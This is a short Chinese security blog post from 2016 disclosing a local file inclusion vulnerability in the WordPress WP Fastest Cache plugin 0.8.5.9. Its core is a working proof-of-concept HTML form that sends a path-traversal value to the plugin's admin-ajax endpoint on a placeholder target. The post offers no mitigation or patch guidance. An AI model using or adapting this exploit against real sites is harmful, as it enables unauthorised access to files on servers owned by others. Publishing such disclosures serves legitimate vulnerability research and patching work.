WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability.

<html>
   <body>
      <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
         <input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />
         <input type="hidden" name="id" value="../exclude" />
         <input type="submit" />
      </form>
   </body>
</html>

本文固定链接: https://www.unhonker.com/bug/1948.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2016年07月13日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞 | 90' s Blog|关注网络信息安全
关键字:

WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!